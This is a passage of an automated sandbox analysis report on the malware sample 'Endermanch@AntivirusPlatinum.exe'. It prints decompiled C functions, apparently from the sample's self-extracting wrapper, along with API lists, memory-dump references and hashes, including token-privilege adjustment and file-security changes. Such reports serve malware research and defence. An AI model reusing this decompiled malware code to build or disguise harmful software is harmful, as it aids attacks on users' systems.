                                                                                                                                                              				}
                                                                                                                                                              				goto L4;
                                                                                                                                                              			}







                                                                                                                                                              0x0040b217
                                                                                                                                                              0x0040b22d
                                                                                                                                                              0x0040b235
                                                                                                                                                              0x0040b23a
                                                                                                                                                              0x0040b275
                                                                                                                                                              0x0040b27b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040b27d
                                                                                                                                                              0x0040b23d
                                                                                                                                                              0x0040b249
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040b249
                                                                                                                                                              0x0040b243
                                                                                                                                                              0x0040b244
                                                                                                                                                              0x0040b265
                                                                                                                                                              0x0040b26b
                                                                                                                                                              0x0040b24f
                                                                                                                                                              0x0040b250
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040b250
                                                                                                                                                              0x0040b247
                                                                                                                                                              0x0040b24d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040b24d
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ItemText$Dialog
                                                                                                                                                              • String ID: GETPASSWORD1
                                                                                                                                                              • API String ID: 1770891597-3292211884
                                                                                                                                                              • Opcode ID: 38ceb6cca60ef45e2ce167e0e55ab463e83bc24fa6cd716c630ca3444178103c
                                                                                                                                                              • Instruction ID: 3f68c6a8021282f0a6222af1267fc3a11be894f7b34df5c1b4352459bfe538a6
                                                                                                                                                              • Opcode Fuzzy Hash: 38ceb6cca60ef45e2ce167e0e55ab463e83bc24fa6cd716c630ca3444178103c
                                                                                                                                                              • Instruction Fuzzy Hash: 71F04431284619BADB119FA09D0DFEF3614EB15741F108466F701F90D0C7F9996197AE
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                              			E00403304(void* __ecx, intOrPtr _a4) {
                                                                                                                                                              				char _v1284;
                                                                                                                                                              				long _t11;
                                                                                                                                                              				int _t14;
                                                                                                                                                              				signed int _t16;
                                                                                                                                                              				void* _t19;
                                                                                                                                                              
                                                                                                                                                              				_t19 = __ecx;
                                                                                                                                                              				if( *((char*)(__ecx + 9)) != 0) {
                                                                                                                                                              					return 0;
                                                                                                                                                              				}
                                                                                                                                                              				_push(_t16);
                                                                                                                                                              				E0040A610(_t19,  &_v1284, E004098F7(0x74), _a4);
                                                                                                                                                              				_t11 = GetLastError();
                                                                                                                                                              				_t14 = MessageBoxA( *0x419f7c,  &_v1284, E004098F7(0x7e), 0x35);
                                                                                                                                                              				SetLastError(_t11);
                                                                                                                                                              				return _t16 & 0xffffff00 | _t14 == 0x00000004;
                                                                                                                                                              			}








                                                                                                                                                              0x00403304
                                                                                                                                                              0x00403311
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403367
                                                                                                                                                              0x00403313
                                                                                                                                                              0x00403327
                                                                                                                                                              0x0040332f
                                                                                                                                                              0x0040334e
                                                                                                                                                              0x0040335b
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 004098F7: LoadStringA.USER32 ref: 00409946
                                                                                                                                                                • Part of subcall function 004098F7: LoadStringA.USER32 ref: 00409958
                                                                                                                                                                • Part of subcall function 0040A610: wvsprintfA.USER32 ref: 0040A623
                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,746AFC30), ref: 0040332F
                                                                                                                                                              • MessageBoxA.USER32 ref: 0040334E
                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 0040335B
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLastLoadString$Messagewvsprintf
                                                                                                                                                              • String ID: @Met
                                                                                                                                                              • API String ID: 2448956881-2381362037
                                                                                                                                                              • Opcode ID: 6199241e6fc427bf97e739a65956078f114f778fcc9a0cd814de5ef21617e504
                                                                                                                                                              • Instruction ID: 9b0c481d7f7e67f7f229bb50c7006102ad22c2c40eeed3713c5a6189838f5978
                                                                                                                                                              • Opcode Fuzzy Hash: 6199241e6fc427bf97e739a65956078f114f778fcc9a0cd814de5ef21617e504
                                                                                                                                                              • Instruction Fuzzy Hash: 64F024328002047AEB103B70AC4DBDB3BACAB01349F04D072F245E61E1EAB989648B64
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00406CED(intOrPtr* __ecx, intOrPtr _a4) {
                                                                                                                                                              				struct _WNDCLASSEXA _v52;
                                                                                                                                                              				short _t17;
                                                                                                                                                              				intOrPtr* _t18;
                                                                                                                                                              				intOrPtr _t21;
                                                                                                                                                              
                                                                                                                                                              				_t21 = _a4;
                                                                                                                                                              				_t18 = __ecx;
                                                                                                                                                              				_v52.cbSize = 0x30;
                                                                                                                                                              				_v52.style = 0x828;
                                                                                                                                                              				_v52.lpfnWndProc = E00406C6F;
                                                                                                                                                              				_v52.cbClsExtra = 0;
                                                                                                                                                              				_v52.cbWndExtra = 0;
                                                                                                                                                              				_v52.hInstance = _t21;
                                                                                                                                                              				_v52.hIcon = 0;
                                                                                                                                                              				_v52.hCursor = LoadCursorA(0, 0x7f00);
                                                                                                                                                              				_v52.hbrBackground = 6;
                                                                                                                                                              				_v52.lpszMenuName = 0;
                                                                                                                                                              				_v52.lpszClassName = "RarHtmlClassName";
                                                                                                                                                              				_v52.hIconSm = 0;
                                                                                                                                                              				_t17 = RegisterClassExA( &_v52);
                                                                                                                                                              				 *_t18 = _t21;
                                                                                                                                                              				return _t17;
                                                                                                                                                              			}







                                                                                                                                                              0x00406cf5
                                                                                                                                                              0x00406d01
                                                                                                                                                              0x00406d03
                                                                                                                                                              0x00406d0a
                                                                                                                                                              0x00406d11
                                                                                                                                                              0x00406d18
                                                                                                                                                              0x00406d1b
                                                                                                                                                              0x00406d1e
                                                                                                                                                              0x00406d21
                                                                                                                                                              0x00406d2a
                                                                                                                                                              0x00406d31
                                                                                                                                                              0x00406d38
                                                                                                                                                              0x00406d3b
                                                                                                                                                              0x00406d42
                                                                                                                                                              0x00406d45
                                                                                                                                                              0x00406d4c
                                                                                                                                                              0x00406d51

                                                                                                                                                              APIs
                                                                                                                                                              • LoadCursorA.USER32 ref: 00406D24
                                                                                                                                                              • RegisterClassExA.USER32(00000030), ref: 00406D45
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ClassCursorLoadRegister
                                                                                                                                                              • String ID: 0$RarHtmlClassName
                                                                                                                                                              • API String ID: 1693014935-3342523147
                                                                                                                                                              • Opcode ID: b12bf7c0c9965d7db7596dfc66fcbb35501a819052bd8b0df238785525de2599
                                                                                                                                                              • Instruction ID: b63988667752bf0d1750ea4bc76319caf74b36bbe64378bd257d001b5d573ad9
                                                                                                                                                              • Opcode Fuzzy Hash: b12bf7c0c9965d7db7596dfc66fcbb35501a819052bd8b0df238785525de2599
                                                                                                                                                              • Instruction Fuzzy Hash: BAF0B6B1D01218ABDB019F99D9889DEFBF8FF59704F10805BE510B7250C7B856158FA9
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                              			E0040ACA1(signed int _a4) {
                                                                                                                                                              				signed int _t4;
                                                                                                                                                              				signed int _t10;
                                                                                                                                                              				struct HDC__* _t13;
                                                                                                                                                              
                                                                                                                                                              				if( *0x41f318 == 0) {
                                                                                                                                                              					_t13 = GetDC(0);
                                                                                                                                                              					if(_t13 != 0) {
                                                                                                                                                              						 *0x41f318 = GetDeviceCaps(_t13, 0x58);
                                                                                                                                                              						ReleaseDC(0, _t13);
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				_t4 =  *0x41f318; // 0x60
                                                                                                                                                              				asm("cdq");
                                                                                                                                                              				_t10 = 0x60;
                                                                                                                                                              				return _t4 * _a4 / _t10;
                                                                                                                                                              			}






                                                                                                                                                              0x0040aca8
                                                                                                                                                              0x0040acb3
                                                                                                                                                              0x0040acb7
                                                                                                                                                              0x0040acc5
                                                                                                                                                              0x0040acca
                                                                                                                                                              0x0040acca
                                                                                                                                                              0x0040acd0
                                                                                                                                                              0x0040acd1
                                                                                                                                                              0x0040acdd
                                                                                                                                                              0x0040acde
                                                                                                                                                              0x0040ace1

                                                                                                                                                              APIs
                                                                                                                                                              • GetDC.USER32(00000000), ref: 0040ACAD
                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 0040ACBC
                                                                                                                                                              • ReleaseDC.USER32 ref: 0040ACCA
                                                                                                                                                              Strings
                                                                                                                                                              • C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe, xrefs: 0040ACAA
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CapsDeviceRelease
                                                                                                                                                              • String ID: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe
                                                                                                                                                              • API String ID: 127614599-570708375
                                                                                                                                                              • Opcode ID: 23e503250e671d4b5bf7f771171e596611eb0c5dc39ab2f57af2eff24b2b2b41
                                                                                                                                                              • Instruction ID: 4be5ef56d5da3d017a27d9bd15ee070ca2e7f4ed1232f0d4ef002000c82c220f
                                                                                                                                                              • Opcode Fuzzy Hash: 23e503250e671d4b5bf7f771171e596611eb0c5dc39ab2f57af2eff24b2b2b41
                                                                                                                                                              • Instruction Fuzzy Hash: 40E01A32545714ABE310DB14AE49B877A64AB15B12F018136FB05AA1E0C7B48464ABDD
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 97%
                                                                                                                                                              			E00404B4F(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                              				char _v1028;
                                                                                                                                                              				char _v2052;
                                                                                                                                                              				char _v5156;
                                                                                                                                                              				char _v6212;
                                                                                                                                                              				char _v9412;
                                                                                                                                                              				void* __ebx;
                                                                                                                                                              				void* _t38;
                                                                                                                                                              				void* _t51;
                                                                                                                                                              				int _t57;
                                                                                                                                                              				void* _t68;
                                                                                                                                                              				void* _t69;
                                                                                                                                                              				void* _t80;
                                                                                                                                                              
                                                                                                                                                              				E00401200(0x24c0);
                                                                                                                                                              				_t70 =  &_v9412;
                                                                                                                                                              				E00403556( &_v9412);
                                                                                                                                                              				_t77 = _a4;
                                                                                                                                                              				_t68 = 0;
                                                                                                                                                              				_push(0);
                                                                                                                                                              				if(E00406045( &_v9412, __edx, _a4, _a8,  &_v9412) == 0 || _v9412 == 0 || _v6212 == 0 || E0040DA54(E004073DB( &_v9412),  &_v6212) == 0) {
                                                                                                                                                              					L15:
                                                                                                                                                              					__eflags = 0;
                                                                                                                                                              					return 0;
                                                                                                                                                              				} else {
                                                                                                                                                              					_t38 = E0040DA54(E004073DB(_t77),  &_v6212);
                                                                                                                                                              					_t86 = _t38;
                                                                                                                                                              					if(_t38 != 0) {
                                                                                                                                                              						goto L15;
                                                                                                                                                              					}
                                                                                                                                                              					while(1) {
                                                                                                                                                              						E0040DB30( &_v1028, _t77, 0x400);
                                                                                                                                                              						E0040A610(_t70, E004073DB( &_v1028), "rtmp%d", _t68);
                                                                                                                                                              						_t80 = _t80 + 0xc;
                                                                                                                                                              						if(E00405767(_t86,  &_v1028, 0) == 0) {
                                                                                                                                                              							break;
                                                                                                                                                              						}
                                                                                                                                                              						_t68 = _t68 + 0x7b;
                                                                                                                                                              						_t88 = _t68 - 0x2710;
                                                                                                                                                              						if(_t68 < 0x2710) {
                                                                                                                                                              							continue;
                                                                                                                                                              						}
                                                                                                                                                              						break;
                                                                                                                                                              					}
                                                                                                                                                              					if(E00405767(_t88,  &_v1028, 0) != 0) {
                                                                                                                                                              						goto L15;
                                                                                                                                                              					}
                                                                                                                                                              					E0040DB30( &_v2052, _t77, 0x400);
                                                                                                                                                              					_t51 = E004073DB( &_v9412);
                                                                                                                                                              					E0040A477(E004073DB( &_v2052), _t51);
                                                                                                                                                              					_t57 = MoveFileA( &_v2052,  &_v1028);
                                                                                                                                                              					_t90 = _t57;
                                                                                                                                                              					if(_t57 == 0) {
                                                                                                                                                              						goto L15;
                                                                                                                                                              					}
                                                                                                                                                              					E00404EC3( &_v5156);
                                                                                                                                                              					_t69 = 0;
                                                                                                                                                              					if(E00405767(_t90, _t77, 0) == 0) {
                                                                                                                                                              						_t69 = E004051D8( &_v5156, _t77, 0, 1);
                                                                                                                                                              					}
                                                                                                                                                              					MoveFileA( &_v1028,  &_v2052);
                                                                                                                                                              					if(_t69 != 0) {
                                                                                                                                                              						E00404F2E( &_v5156);
                                                                                                                                                              						E00404FAC( &_v5156);
                                                                                                                                                              					}
                                                                                                                                                              					E00405074(_t69,  &_v5156);
                                                                                                                                                              					return 1;
                                                                                                                                                              				}
                                                                                                                                                              			}















                                                                                                                                                              0x00404b57
                                                                                                                                                              0x00404b5f
                                                                                                                                                              0x00404b65
                                                                                                                                                              0x00404b6a
                                                                                                                                                              0x00404b6d
                                                                                                                                                              0x00404b6f
                                                                                                                                                              0x00404b82
                                                                                                                                                              0x00404ce8
                                                                                                                                                              0x00404ce8
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404bc1
                                                                                                                                                              0x00404bcf
                                                                                                                                                              0x00404bd4
                                                                                                                                                              0x00404bd6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404be1
                                                                                                                                                              0x00404bea
                                                                                                                                                              0x00404c02
                                                                                                                                                              0x00404c07
                                                                                                                                                              0x00404c1a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404c1c
                                                                                                                                                              0x00404c1f
                                                                                                                                                              0x00404c25
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404c25
                                                                                                                                                              0x00404c37
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404c46
                                                                                                                                                              0x00404c52
                                                                                                                                                              0x00404c65
                                                                                                                                                              0x00404c7e
                                                                                                                                                              0x00404c80
                                                                                                                                                              0x00404c82
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404c8a
                                                                                                                                                              0x00404c92
                                                                                                                                                              0x00404c9b
                                                                                                                                                              0x00404cad
                                                                                                                                                              0x00404cad
                                                                                                                                                              0x00404cbd
                                                                                                                                                              0x00404cc1
                                                                                                                                                              0x00404cc9
                                                                                                                                                              0x00404cd4
                                                                                                                                                              0x00404cd4
                                                                                                                                                              0x00404cdf
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00404ce4

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0040DA54: CompareStringA.KERNEL32(00000400,00001001,0040BAA2,000000FF,?,000000FF,0040BAA2,?,STATIC), ref: 0040DA6A
                                                                                                                                                                • Part of subcall function 0040A610: wvsprintfA.USER32 ref: 0040A623
                                                                                                                                                                • Part of subcall function 00405767: GetFileAttributesW.KERNEL32(?,00404D18,00000045,?,?,?,?), ref: 0040577F
                                                                                                                                                              • MoveFileA.KERNEL32 ref: 00404C7E
                                                                                                                                                              • MoveFileA.KERNEL32 ref: 00404CBD
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$Move$AttributesCompareStringwvsprintf
                                                                                                                                                              • String ID: rtmp%d
                                                                                                                                                              • API String ID: 1782884900-3303766350
                                                                                                                                                              • Opcode ID: d76d8e228970df82160ae1bd043e0aa0810584178d57b14355410fbc6a8d3338
                                                                                                                                                              • Instruction ID: 2635e19358c8d7c776646382d2ab8edccefdc26a919b6fac259dc95f7fea154b
                                                                                                                                                              • Opcode Fuzzy Hash: d76d8e228970df82160ae1bd043e0aa0810584178d57b14355410fbc6a8d3338
                                                                                                                                                              • Instruction Fuzzy Hash: 744122B680521865DF20F6A29C45FEB737CAF45348F0504BBBA04B7191DA78AB498F78
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 60%
                                                                                                                                                              			E00403785(void* __edx, void* __eflags, intOrPtr _a4, CHAR* _a8, WCHAR* _a12) {
                                                                                                                                                              				char _v8;
                                                                                                                                                              				char _v12;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				void* _t13;
                                                                                                                                                              				int _t15;
                                                                                                                                                              				void* _t17;
                                                                                                                                                              				intOrPtr _t38;
                                                                                                                                                              
                                                                                                                                                              				_t13 = E00406EA5();
                                                                                                                                                              				if(_t13 == 0) {
                                                                                                                                                              					return _t13;
                                                                                                                                                              				}
                                                                                                                                                              				_t29 = _a4;
                                                                                                                                                              				_v16 = 0;
                                                                                                                                                              				_v12 = 0;
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				_t15 = E00402511(_a4, __edx,  &_v16, 0);
                                                                                                                                                              				if(_t15 != 0) {
                                                                                                                                                              					E004034AA();
                                                                                                                                                              					_t17 = 7;
                                                                                                                                                              					_t38 =  *0x41486d; // 0x0
                                                                                                                                                              					if(_t38 != 0) {
                                                                                                                                                              						_t17 = 0xf;
                                                                                                                                                              					}
                                                                                                                                                              					_push(_v16);
                                                                                                                                                              					_push(_t17);
                                                                                                                                                              					if(_a12 == 0) {
                                                                                                                                                              						_t15 = SetFileSecurityA(_a8, ??, ??);
                                                                                                                                                              					} else {
                                                                                                                                                              						_t15 = SetFileSecurityW(_a12, ??, ??);
                                                                                                                                                              					}
                                                                                                                                                              					if(_t15 == 0) {
                                                                                                                                                              						E00402C95(E0040B2A9(_t29 + 0x17, E004098F7(0x3e4), _a8));
                                                                                                                                                              						_t15 = E0040325C(0x414c7c, 1);
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				if(_v16 != 0) {
                                                                                                                                                              					_t15 = E0040A205(_v16);
                                                                                                                                                              				}
                                                                                                                                                              				return _t15;
                                                                                                                                                              			}










                                                                                                                                                              0x0040378b
                                                                                                                                                              0x00403792
                                                                                                                                                              0x0040382b
                                                                                                                                                              0x0040382b
                                                                                                                                                              0x0040379a
                                                                                                                                                              0x004037a6
                                                                                                                                                              0x004037a9
                                                                                                                                                              0x004037ac
                                                                                                                                                              0x004037af
                                                                                                                                                              0x004037b6
                                                                                                                                                              0x004037b8
                                                                                                                                                              0x004037bf
                                                                                                                                                              0x004037c0
                                                                                                                                                              0x004037c6
                                                                                                                                                              0x004037ca
                                                                                                                                                              0x004037ca
                                                                                                                                                              0x004037cb
                                                                                                                                                              0x004037ce
                                                                                                                                                              0x004037d2
                                                                                                                                                              0x004037e2
                                                                                                                                                              0x004037d4
                                                                                                                                                              0x004037d7
                                                                                                                                                              0x004037d7
                                                                                                                                                              0x004037ea
                                                                                                                                                              0x0040380d
                                                                                                                                                              0x00403816
                                                                                                                                                              0x00403816
                                                                                                                                                              0x004037ea
                                                                                                                                                              0x0040381e
                                                                                                                                                              0x00403823
                                                                                                                                                              0x00403823
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00406EA5: GetVersionExA.KERNEL32(?), ref: 00406EC9
                                                                                                                                                                • Part of subcall function 004034AA: GetCurrentProcess.KERNEL32(00000020,?,00000000,004037BD,?,00000000,?,?), ref: 004034CC
                                                                                                                                                                • Part of subcall function 004034AA: OpenProcessToken.ADVAPI32(00000000), ref: 004034D3
                                                                                                                                                                • Part of subcall function 004034AA: LookupPrivilegeValueA.ADVAPI32 ref: 004034FD
                                                                                                                                                                • Part of subcall function 004034AA: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 00403514
                                                                                                                                                                • Part of subcall function 004034AA: GetLastError.KERNEL32 ref: 0040351A
                                                                                                                                                                • Part of subcall function 004034AA: LookupPrivilegeValueA.ADVAPI32(00000000,SeRestorePrivilege,?), ref: 00403535
                                                                                                                                                                • Part of subcall function 004034AA: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 00403546
                                                                                                                                                                • Part of subcall function 004034AA: CloseHandle.KERNEL32(?), ref: 0040354B
                                                                                                                                                              • SetFileSecurityW.ADVAPI32(?,00000007,?,?,00000000,?,?), ref: 004037D7
                                                                                                                                                              • SetFileSecurityA.ADVAPI32(?,00000007,?), ref: 004037E2
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Token$AdjustFileLookupPrivilegePrivilegesProcessSecurityValue$CloseCurrentErrorHandleLastOpenVersion
                                                                                                                                                              • String ID: |LA
                                                                                                                                                              • API String ID: 4147173873-4290591017
                                                                                                                                                              • Opcode ID: 031a4094fff4cba979b8f8a1f0c503f74b4c030b813af40330e59ae485e2f175
                                                                                                                                                              • Instruction ID: 0910def5baac2a01ac3a580e2fa06c7b6af0b123cc6588ceabb19b3ba280500f
                                                                                                                                                              • Opcode Fuzzy Hash: 031a4094fff4cba979b8f8a1f0c503f74b4c030b813af40330e59ae485e2f175
                                                                                                                                                              • Instruction Fuzzy Hash: 0F118F72900214BBDF017F959C4599D7BACAB48315F00C4BBF905B62C1D77D8F508699
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 44%
                                                                                                                                                              			E00402C96(intOrPtr _a4, long _a8, int* _a12, intOrPtr _a16) {
                                                                                                                                                              				struct HWND__* _t9;
                                                                                                                                                              				int _t14;
                                                                                                                                                              				int _t15;
                                                                                                                                                              				struct HWND__* _t17;
                                                                                                                                                              				int* _t18;
                                                                                                                                                              
                                                                                                                                                              				if( *0x41a792 == 0) {
                                                                                                                                                              					__eflags = _a4 - 2;
                                                                                                                                                              					_t9 =  *0x419f80; // 0x0
                                                                                                                                                              					_t17 = _t9;
                                                                                                                                                              					if(_a4 == 2) {
                                                                                                                                                              						_t15 = IsWindowVisible(_t9);
                                                                                                                                                              						__eflags = _t15;
                                                                                                                                                              						if(_t15 == 0) {
                                                                                                                                                              							_t17 = 0;
                                                                                                                                                              							__eflags = 0;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					__eflags =  *0x419ee8; // 0x0
                                                                                                                                                              					if(__eflags != 0) {
                                                                                                                                                              						L9:
                                                                                                                                                              						_t18 = _a12;
                                                                                                                                                              						E0040A477(_t18, 0x419ee8);
                                                                                                                                                              					} else {
                                                                                                                                                              						_t14 = DialogBoxParamA( *0x414c74, "GETPASSWORD1", _t17, E0040B213, _a8);
                                                                                                                                                              						__eflags = _t14;
                                                                                                                                                              						if(_t14 != 0) {
                                                                                                                                                              							goto L9;
                                                                                                                                                              						} else {
                                                                                                                                                              							_t18 = _a12;
                                                                                                                                                              							 *_t18 = 0;
                                                                                                                                                              							 *0x419f78 = 1;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					__eflags =  *_t18;
                                                                                                                                                              					if( *_t18 != 0) {
                                                                                                                                                              						_push(0x80);
                                                                                                                                                              						_push(_t18);
                                                                                                                                                              						_push(0x41a792);
                                                                                                                                                              						goto L12;
                                                                                                                                                              					}
                                                                                                                                                              				} else {
                                                                                                                                                              					_push(_a16);
                                                                                                                                                              					_t18 = _a12;
                                                                                                                                                              					_push(0x41a792);
                                                                                                                                                              					_push(_t18);
                                                                                                                                                              					L12:
                                                                                                                                                              					E0040A4AB();
                                                                                                                                                              				}
                                                                                                                                                              				return 0 |  *_t18 != 0x00000000;
                                                                                                                                                              			}








                                                                                                                                                              0x0040bc67
                                                                                                                                                              0x0040bc77
                                                                                                                                                              0x0040bc7b
                                                                                                                                                              0x0040bc80
                                                                                                                                                              0x0040bc82
                                                                                                                                                              0x0040bc85
                                                                                                                                                              0x0040bc8b
                                                                                                                                                              0x0040bc8d
                                                                                                                                                              0x0040bc8f
                                                                                                                                                              0x0040bc8f
                                                                                                                                                              0x0040bc8f
                                                                                                                                                              0x0040bc8d
                                                                                                                                                              0x0040bc91
                                                                                                                                                              0x0040bc97
                                                                                                                                                              0x0040bcc8
                                                                                                                                                              0x0040bcc8
                                                                                                                                                              0x0040bcd1
